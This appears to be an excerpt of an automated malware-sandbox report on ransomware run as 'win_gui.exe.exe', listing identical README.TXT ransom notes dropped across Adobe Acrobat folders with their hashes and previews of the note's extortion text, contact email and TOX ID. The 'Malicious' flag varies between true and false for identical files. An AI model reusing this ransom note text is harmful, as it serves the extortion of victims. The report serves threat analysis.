                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:true
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files-select\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files-select\css\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files-select\js\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\css\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\ar-ae\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:true
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\ca-es\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:true
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\cs-cz\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:true
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\da-dk\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\de-de\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\en-ae\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\en-gb\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:true
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\en-il\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:true
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\es-es\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:true
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\eu-es\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
